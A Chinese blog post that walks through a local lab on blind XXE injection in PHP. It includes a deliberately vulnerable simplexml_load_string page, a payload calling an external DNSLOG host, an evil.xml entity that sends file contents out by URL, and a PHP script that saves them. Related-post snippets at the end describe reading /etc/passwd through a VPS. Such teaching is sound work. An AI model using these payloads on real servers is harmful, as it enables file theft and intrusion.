无回显练习~XXE注入

已于 2024-07-31 22:52:18 修改
阅读量202 收藏
点赞数 1
文章标签: 网络安全 网络 xml php
于 2024-07-31 19:45:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/140805449
版权

在这里插入图片描述
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。

blind xxe (盲注)可以使用外带数据通道,提取数据 ;

# 编写一个1.php的文档,输入一下内容
<?php
error_reporting(0);
$string_xml = '<?xml version="1.0" encoding="GB18030"?><note><to>George</to>
<from>John</from><heading>Reminder</heading><body>xml_stzr</body></note>';
$xml = isset($_GET['xml'])?$_GET['xml']:$string_xml;
$data = simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT);
echo '<meta charset="GB18030">';
?>

image-20240730143320270

登录127.0.0.1/1.php后发现页面空白,证明没有回显

# 我们登录http://dnslog.pw/dns/来查看我们直接的域名

image-20240730143857085

# 然后我们通过DNSLOG来外带测试
<?xml version = "1.0"?>
<!DOCTYPE a [<!ENTITY b SYSTEM "http://mazha.dnslog.pw">]>
<c>&b;</c>

# 将其中的域名改为自己的并进行编码

image-20240730144030635

# 自己构建外带写入文件 重点中的重点

# 创建evil.xml 文件
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1/1.php?
file=%file;'>">

image-20240730150319701

# 创建一个1.php进行编码
<?php file_put_contents("1.txt", $_GET['file']); ?>  
# 并且在c盘下创建一个1.txt文件

image-20240730150548309

# 创建一个2.php
<?php
error_reporting(0);
$string_xml = '<?xml version="1.0" encoding="GB18030"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>xml_stzr</body></note>';

$xml = isset($_GET['xml'])?$_GET['xml']:$string_xml;

$data = simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT);
echo '<meta charset="GB18030">';

?>

image-20240730152832394

# 最后把1.php中的代码编码后放到2.php后面
?xml= 编码

image-20240730153036251

# 发现在www目录下找到了1.txt文件,内容也显示出来了

image-20240730153125565

发现在www目录下找到了1.txt文件,内容也显示出来了

好小子,离成功又近了一步!!!

蚂蚱.top
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xxe主看这个吧】xml --xxe 各种注入学习 也就一些基本的方法,再加一个 xxe盲注,vps外带的
Zero_Adam的博客
04-10 436
目录:一、基础知识:二、注入方法:1. 直接通过DTD外部实体声明2. 通过DTD文档引入外部DTD文档,再引入外部实体声明3. 通过DTD外部实体声明引入 外部实体声明三、产生的危害:1. 读取任意文件2. XXE回显使用vps外带 一、基础知识: 基础看这篇就好 二、注入方法: 1. 直接通过DTD外部实体声明 内部实体声明,应该是无法触发xxe漏洞的,所以我们用的应该都是 外部实体声明。也就是 SYSTEM 后面的东西都是外部的url的东西?。。不是呀,这个应该就不影响了,只是 system 后面的
windows文件读取 xxe_XXE原来如此简单(无回显篇)
weixin_35531726的博客
01-06 1076
可能有人会好奇我为什么非要分成两篇来分享呢?我的考虑是学习需要循序渐进学习也不可能一蹴而就短暂的爆发式学习状态会让一个人丧失后续的学习动力,当然不是所有人都这样。但是绝大多数是这样的。相信你看到这篇文章的时候,你已经掌握了 回显XXE的发现和利用重点: 那么在回显XXE的发现的基础上我们来分享一下无回显XXE怎么去利用呢?既然是无回显,也就是说,我输入什么内容 ,查看什么内容,我们都将...
PHP回显渗透测试总结
weixin_42508548的博客
11-24 582
在渗透测试过程中,开发不可能每一次都将结果输出到页面上,也就是漏洞无回显的情况,那么在这种情况下,我们可以通过dnslog判断漏洞存在,或者通过起一个python的http服务来判断,方法很多,下面主要进行一些情况的分析。 0x02无回显概念 无回显,即执行的payload在站点没有输出,无法进行进一步操作。在渗透测试过程中,漏洞点不可能总是能够在返回页面进行输出,那么这时候就需要进行一些无回显利用了。 0x03不同漏洞的无回显 1、SQL注入回显 SQL注入,作为OWASP常年
XXE回显(使用vps-payload外带)
per_se_veran_ce的博客
03-22 2295
1、抓包写入payload 2、vps根目录下存放evil.dtd文件,监听端口设置为1333 3、开启端口监听 4、Burpsuite发送请求包 5、vps监听获得/etc/passwd的base64编码 6、解码 ...
xxe漏洞提取无回显数据
qq_42307546的博客
01-26 539
<?php $string_xml = '<?xml version="1.0" encoding="utf-8"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>xml 实体注入</body></note>'; $xml = isset($_GET['xml'])?$_GET
XXE漏洞复现(有无回显
cainiao17441898的博客
07-01 1782
环境:这里可以在metasploitable中进行试验,不可以在centos中进行试验,因为默认情况下centos中已经修复相关漏洞。libxml2.9.0之后默认不执行外部实体。用命令:rpm -qa | grep libxml可以去查看libxml的版本。 复现: 先去生成一个解析xml数据并打印传入的数据的一个php文件。 <?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; e
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
Pikachu漏洞平台练习——XXE实体类型举例、Blind OOB XXE、其他协议、XXE漏洞读取文件
7Riven's blog
11-14 1502
1.XXE概述 XXE-“xml external entity injection”,即xml外部实体注入。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题,也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 2.本地实体类型与外部的实体类型 本地实体类型举例说明如下: <?xml v...
XXE漏洞
qi_SJQ_的博客
01-21 571
概念 全称XML External Entity Injection, 即xml外部实体注入漏洞,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口 扫描、攻击内网网站等危害。 了解一些xml,我们知道xml是一种数据存储类型,用于传输,而html用于显示。 XML被设计为数据和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可 选)、文档元素,其焦点是数据传输工具。 自己当初的学习笔记 XML与HTML的主要差异: XML被设计为传输和存储数据,其焦点是数据的内容。 HTML被设.
WEB漏洞——XXE
qq_63594215的博客
04-12 887
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
xxe漏洞学习
L1ni01
11-06 189
xxe漏洞学习 一.XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD元素 DTD属性 以下是 属性类型的选项: 我们XXE 利用的是 它的实体属性 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。 内部声明DTD <!DOCTYPE 根元素 [元素声明]&gt
XXE回显攻击详解
永远是少年
12-23 1547
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE回显攻击详解。 一、XXE回显攻击简介 二、XXE回显攻击实战
XXE漏洞-黑白盒测试+无回显
xiaoheizi的博客
07-02 968
XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。test.dtd内容:
XXE环境搭建及实战 包含有回显回显操作
t小小小白的博客
08-19 5631
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
XXE漏洞——无回显外带生成文件
m0_65544268的博客
07-25 380
这样我们可以读取到目标主机的任意文件写入到c://file.txt中。这样我们就写入到文件中了。
回显XXE攻击:隐秘的数据泄露技术
最新发布
weixin_43822401的博客
06-14 564
回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
day41 XML&XXE&无回显&DTD实体&伪协议&代码审计
wanjia01的博客
12-09 483
知识点:1、XML&XXE-原理&发现&利用&修复等2、XML&XXE-黑盒模式下的发现与利用3、XML&XXE-白盒模式下的审计与利用4、XML&XXE-无回显&伪协议&产生层面#思路点:参考:https://www.cnblogs.com/20175211lyz/p/11413335.html-XXE黑盒发现:1、获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试。
WEB攻防-XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&黑白盒挖掘
siu~
11-02 532
知识点: 1、XXE&XML-原理-用途&外实体&安全 2、XXE&XML-黑盒-格式类型&数据类型 3、XXE&XML-白盒-函数审计&回显方案
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值